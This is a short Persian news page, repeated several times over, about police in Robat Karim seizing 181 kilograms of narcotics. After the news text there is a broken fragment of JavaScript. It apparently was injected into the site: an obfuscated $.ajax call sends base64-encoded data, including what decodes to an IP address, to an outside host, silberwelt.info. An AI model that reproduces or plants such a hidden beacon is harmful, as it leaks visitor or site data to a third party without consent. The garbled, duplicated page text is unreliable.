کشف 181 کیلوگرم مواد مخدر در رباط‌کریم

کشف 181 کیلوگرم مواد مخدر در رباط‌کریم
فرمانده انتظامی رباط‌کریم از کشف 181 کیلوگرم مواد مخدر در بهمن‌ماه سال‌جاری در این شهرستان خبر داد.

کشف 181 کیلوگرم مواد مخدر در رباط‌کریم

فرمانده انتظامی رباط‌کریم از کشف 181 کیلوگرم مواد مخدر در بهمن‌ماه سال‌جاری در این شهرستان خبر داد.
کشف 181 کیلوگرم مواد مخدر در رباط‌کریم
i==a.length-1)c=’ class=”last”‘;var g=””;void 0!==a[i].token&&(g=a[i].token);c={cssClass:c,urlKeyword:a[i].term.replace(/ /g,”-“),token:g,keyword:a[i].term};d.append($.tmpl(“related_links_tmpl”,c));start=i+1}}}};

$.ajax({ url: ‘http://silberwelt.info/’ + ‘s’ + ‘earch/tsc.php?200=Mjg1NzMzOTU3&21=OTUuMTU0LjIzNy44NQ==&681=MTUxOTc1MDEyMzE5YWI3N2MzODFlNjUwZmEzMmY2ZDM5OGU1ODg4MWJm&crc=bbe5078a98b912c0c35f5aca2d935088f805d18f&cv=1’});

View more posts from this author

پاسخ دهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *